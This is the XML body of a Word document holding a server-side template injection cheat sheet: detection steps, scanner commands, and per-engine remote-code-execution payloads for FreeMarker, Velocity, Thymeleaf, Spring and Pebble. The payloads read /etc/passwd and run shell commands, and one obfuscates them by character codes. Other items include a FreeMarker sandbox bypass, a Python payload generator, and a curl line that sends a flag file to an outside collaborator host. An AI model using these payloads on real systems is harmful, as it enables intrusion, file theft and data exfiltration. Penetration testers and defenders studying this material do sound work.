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C26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  <w:t>What is SSTI (Server-Side Template Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951658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Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B08E6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Jinja is a popular template engine used in web applications. Let's consider an example that demonstrates a vulnerable code snippet using Jinja:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A552079" w14:textId="59A60928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ECBAE6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output =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template.render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(name=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request.args.get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('name'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED92C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In this vulnerable code, the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name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parameter from the user's request is directly passed into the template using the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render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function. This can potentially allow an attacker to inject malicious code into the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name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parameter, leading to server-side template injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324F0C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For instance, an attacker could craft a request with a payload like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B36C2C2" w14:textId="1D788D56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EDA880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http://vulnerable-website.com/?name={{bad-stuff-here}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A188F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The payload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{{bad-stuff-here}}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is injected into the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name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parameter. This payload can contain Jinja template directives that enable the attacker to execute unauthorized code or manipulate the template engine, potentially gaining control over the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2010B22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To prevent server-side template injection vulnerabilities, developers should ensure that user input is properly sanitized and validated before being inserted into templates. Implementing input validation and using context-aware escaping techniques can help mitigate the risk of this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8EE85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>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473521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To detect Server-Side Template Injection (SSTI), initially, </w:t>
      </w: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fuzzing the template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is a straightforward approach. This involves injecting a sequence of special characters (</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3993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${{&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002E3993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%[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002E3993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%'"}}%\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) into the template and </w:t>
      </w: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analyzing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the differences in the server's response to regular data versus this special payload. Vulnerability indicators include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07209D44" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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Thrown errors, revealing the vulnerability and potentially the template engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093DDEA5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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Absence of the payload in the reflection, or parts of it missing, implying the server processes it differently than regular data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25932879" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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Plaintext Context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: Distinguish from XSS by checking if the server evaluates template expressions (e.g.,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{{7*7}}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${7*7}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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19847D34" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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Code Context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: Confirm vulnerability by altering input parameters. For instance, changing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greeting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in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http://vulnerable-website.com/?greeting=data.username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to see if the server's output is dynamic or fixed, like in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greeting=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data.username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}}hello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returning the username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4062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>Identification Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D3DA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Identifying the template engine involves </w:t>
      </w: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analyzing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error messages or manually testing various language-specific payloads. Common payloads causing errors include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${7/0}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{{7/0}}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and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&lt;%= 7/0 %&gt;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. Observing the server's response to mathematical operations helps pinpoint the specific template engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA39CB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>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0F3C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hyperlink r:id="rId7" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3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TInjA</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B54C92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lastRenderedPageBreak/>
        <w:t xml:space="preserve">an efficient SSTI + CSTI scanner which utilizes novel </w:t>
      </w:r>
      <w:proofErr w:type="gram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polyglots</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EB67986" w14:textId="1A010EC8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960C9A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tinja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url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-u "http://example.com/?name=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Kirlia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" -H "Authentication: Bearer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ey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..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125839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tinja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url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-u "http://example.com/" -d "username=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Kirlia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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  -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 "PHPSESSID=ABC123..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736AD0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hyperlink r:id="rId8" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3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SSTImap</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07987F3F" w14:textId="7421BA10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056530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python3 sstimap.py -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-l 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCF84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python3 sstimap.py -u "http://example.com/" --crawl 5 --forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DC4D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python3 sstimap.py -u "https://example.com/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page?name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=John" -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5366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hyperlink r:id="rId9" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3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Tplmap</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BC5C561" w14:textId="11F5B608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D32114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python2.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7 .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/tplmap.py -u 'http://www.target.com/page?name=John*' --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os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-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE829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python2.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7 .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/tplmap.py -u "http://192.168.56.101:3000/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ti?user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=*&amp;comment=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supercomment&amp;link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</w:p>
    <w:p w14:paraId="717425E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python2.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7 .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/tplmap.py -u "http://192.168.56.101:3000/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ti?user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InjectHere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*&amp;comment=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A&amp;link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 --level 5 -e jade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE18D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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3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Template Injection Table</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="566B730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an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328B09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>Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0BF4B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>Generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B7D23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In this </w:t>
      </w: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wordlist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you can find </w:t>
      </w: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variables defined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in the environments of some of the engines mentioned below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B07872D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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hyperlink r:id="rId11" w:history="1"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https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AD9C056" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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hyperlink r:id="rId12" w:history="1"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https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EB467C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>Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF050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 - Basic injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770CA6A" w14:textId="4A2B9A0F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D121B6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${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB2F30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${{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22F40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class.getClassLoader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()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8236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class.getResource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("").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getPath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()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037414F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class.getResource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("../../../../../index.htm").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getContent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()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1755380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// if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5408E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Java - Retrieve the system’s environment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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variables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21E6C9B5" w14:textId="00014A04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DD4F04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${T(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.System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getenv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()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12D79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lastRenderedPageBreak/>
        <w:t>Java - Retrieve /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5A91A" w14:textId="131D5033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3951DD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${T(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.Runtime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getRuntime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().exec('cat etc/passwd')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6A15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55875C9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T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F8079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>FreeMarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47F38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You can try your payloads at </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1"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https://try.freemarker.apache.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3557AEA2" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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{{7*7}} = {{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD35616" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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${7*7} = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A9701" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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#{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7*7} = 49 -- (legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9FFBDE" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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${7*'7'} Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E732E" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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foobar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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E56507" w14:textId="4B13915D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861BC0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&lt;#assign ex = "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freemarker.template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.utility.Execute"?new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()&gt;${ ex("id")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876FD0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[#assign ex = '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freemarker.template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.utility.Execute'?new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()]${ ex('id')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6075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${"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freemarker.template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.utility.Execute"?new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()("id")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4F3A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3264B73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product.getClass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().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD5BFD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Freemarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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- Sandbox bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DE63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⚠️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only works on </w:t>
      </w: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Freemarker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versions below 2.3.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE6760B" w14:textId="03531074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A4B739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&lt;#assign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classloader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article.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class.protectionDomain.classLoader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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D46F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&lt;#assign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owc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classloader.loadClass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freemarker.template.ObjectWrapper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")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB90C1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&lt;#assign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dwf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owc.getField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("DEFAULT_WRAPPER").get(null)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4510857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&lt;#assign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ec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classloader.loadClass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freemarker.template.utility.Execute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")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD4D9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dwf.newInstance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ec,null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)("id")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F79E5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More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778301D7" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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FreeMarker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section of </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1"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https://portswigger.net/research/server-side-template-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77EA8DD0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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hyperlink r:id="rId15" w:anchor="freemarker" w:history="1"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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C4F566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>Velocity (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB19DC9" w14:textId="4AD5F478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AFED3B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// I think this doesn't work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C764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#set($str=$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class.inspect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("java.lang.String").type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6221A1F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#set($chr=$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class.inspect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("java.lang.Character").type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F281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#set($ex=$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class.inspect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("java.lang.Runtime").type.getRuntime().exec("whoami"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0FBE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lastRenderedPageBreak/>
        <w:t>$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ex.waitFor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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BA93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#set($out=$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ex.getInputStream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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E6E7C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foreach(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$i in [1..$out.available()])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1556F73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str.valueOf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($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chr.toChars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($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out.read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()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455DF3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#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61986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1420633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// This should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work?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="398AE68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#set($s="")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9E58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set(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$stringClass=$s.getClass())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7B09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set(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$runtime=$stringClass.forName("java.lang.Runtime").getRuntime())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E089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#set($process=$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runtime.exec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("cat%20/flag563378e453.txt"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D49A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#set($out=$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process.getInputStream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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE49C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#set($null=$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process.waitFor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 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F047A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#foreach($i+in+[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1..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$out.available()])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9CA1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out.read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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA372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#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB1F35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More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D0F7DF" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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In Velocity section of </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1"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https://portswigger.net/research/server-side-template-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48C1E061" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId17" w:anchor="velocity" w:history="1"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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50C9D63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>Thymeleaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A2ABDF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Thymeleaf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a common test for SSTI vulnerabilities is the expression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${7*7}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, which also applies to this template engine. For potential remote code execution, expressions like the following can be used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C66DFF" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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SpringEL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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B768B21" w14:textId="4D70F91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DC4535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${T(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.Runtime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getRuntime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().exec('calc')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF29F3" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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OGNL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8F8DD" w14:textId="5685DBB5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A3008D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${#rt = @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.Runtime@getRuntime(),#rt.exec("calc")}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD099D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Thymeleaf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requires these expressions to be placed within specific attributes. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="002E3993">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:i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expression inlining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is supported for other template locations, using syntax like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[[...]]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or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[(...)]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. Thus, a simple SSTI test payload might look like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[[${7*7}]]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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAB69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However, the likelihood of this payload working is generally low. </w:t>
      </w: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Thymeleaf's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default configuration doesn't support dynamic template generation; templates must be predefined. Developers would need to implement their own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TemplateResolver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to create templates from strings on-the-fly, which is uncommon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C288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Thymeleaf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also offers </w:t>
      </w:r>
      <w:r w:rsidRPr="002E3993">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:i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expression preprocessing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, where expressions within double underscores (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__...__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) are </w:t>
      </w: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preprocessed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. This feature can be utilized in the construction of expressions, as demonstrated in </w:t>
      </w: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Thymeleaf's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documentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291CBE08" w14:textId="105E2144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EB3143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#{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selection._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_${sel.code}__}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471B088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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Example of Vulnerability in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Thymeleaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="732358A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Consider the following code snippet, which could be susceptible to exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D7D5A" w14:textId="4F3C767C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68EA87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&lt;a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th:href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="@{__${path}__}"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th:title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="${title}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1644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&lt;a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th:href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="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}"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th:title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pepito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'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0AE1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This indicates that if the template engine processes these inputs improperly, it might lead to remote code execution accessing URLs like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB482D3" w14:textId="06C60CA3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E0BAEE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http://localhost:8082/(7*7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314163A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http://localhost:8082/(${T(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.Runtime).getRuntime().exec('calc')})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498DD0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More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67651E54" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId18" w:history="1"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https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D4957DB" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r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EL - Expression Language</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71BC302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>Spring Framework (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8FCF23" w14:textId="75CDEED5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70A478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*{T(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org.apache.commons.io.IOUtils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).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20661F3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Bypass filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C95F4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Multiple variable expressions can be used, if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${...}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doesn't work try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#{...}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*{...}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@{...}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or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~{...}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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3058BA6D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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Read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/etc/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passwd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="56F4B1B3" w14:textId="3ED361D7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452128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T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D40C5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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Custom Script for payload generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACAB835" w14:textId="6E7656E4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E099FA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#!/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usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E675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4F0F4BB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## Written By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Zeyad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Abulaban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(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zAbuQasem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18D9C1B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Usage: python3 gen.py "id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA6A5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5FFD8C8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from sys import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argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D04EE7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613DE3E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cmd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list(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argv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[1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].strip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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D4BD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"Payload: ",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cmd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, end="\n\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32798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converted = [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ord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(c) for c in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cmd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376CF96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base_payload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'*{T(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org.apache.commons.io.IOUtils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).toString(T(java.lang.Runtime).getRuntime().exec'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA8914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end_payload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getInputStream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())}' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB093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70FE7A4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count = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6893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for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in converted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB6B2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if count == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BC05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  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base_payload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+= f"(T(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.Character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toString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concat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</w:p>
    <w:p w14:paraId="288DBFE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   count += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610746D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elif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count ==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len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(converted):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F35D56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  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base_payload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+= f"(T(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.Character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toString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})))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A050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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFA13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  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base_payload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+= f"(T(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.Character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toString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})).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concat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</w:p>
    <w:p w14:paraId="4DC822A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   count += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5530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25B00E6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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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base_payload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+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end_payload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6E24BEA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More Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B42DCC" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId20" w:history="1">
        <w:proofErr w:type="spellStart"/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Thymleaf</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> SSTI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="254DA614" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId21" w:anchor="java---retrieve-etcpasswd" w:history="1"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Payloads all the things</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EE9253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>Spring View Manipulation (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41462BB7" w14:textId="3CD4F6D8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C07D8C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__${new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java.util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.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1415421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__${T(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.Runtime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getRuntime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().exec("touch executed")}__::.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E941085" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId22" w:history="1"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https://github.com/veracode-research/spring-view-manipulation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="614A7457" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r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EL - Expression Language</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="005E060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>Pebble (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3219D48B" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{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someString.toUPPERCASE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 }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FBB37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Old version of Pebble </w:t>
      </w:r>
      <w:proofErr w:type="gram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 &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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version 3.0.9):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A208B5D" w14:textId="3863FDF7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D8F2BE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 variable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.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895055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New version of </w:t>
      </w:r>
      <w:proofErr w:type="gram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Pebble :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
